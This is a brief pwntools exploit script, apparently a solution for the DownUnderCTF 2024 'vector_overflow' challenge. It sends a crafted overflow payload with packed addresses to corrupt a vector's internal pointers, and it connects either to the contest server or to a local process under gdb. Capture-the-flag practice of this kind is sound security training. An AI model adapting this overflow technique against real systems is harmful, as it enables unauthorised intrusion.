#!/usr/bin/env python3
from pwn import *

exe = ELF("./vector_overflowe")
# context.log_level='debug'
context.terminal = ["foot"]
if args.REMOTE:
    p = remote("2024.ductf.dev",  30013)
else:
    p = process([exe.path])
    gdb.attach(p, """

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)

sl(b"\0\0\0\0\0\0\0\x21DUCTF".ljust(16, b"\0")+p64(0x405210)+p64(0x405215)*2+p64(0)+p64(0x4654435544))







p.interactive()
# good luck pwning :)

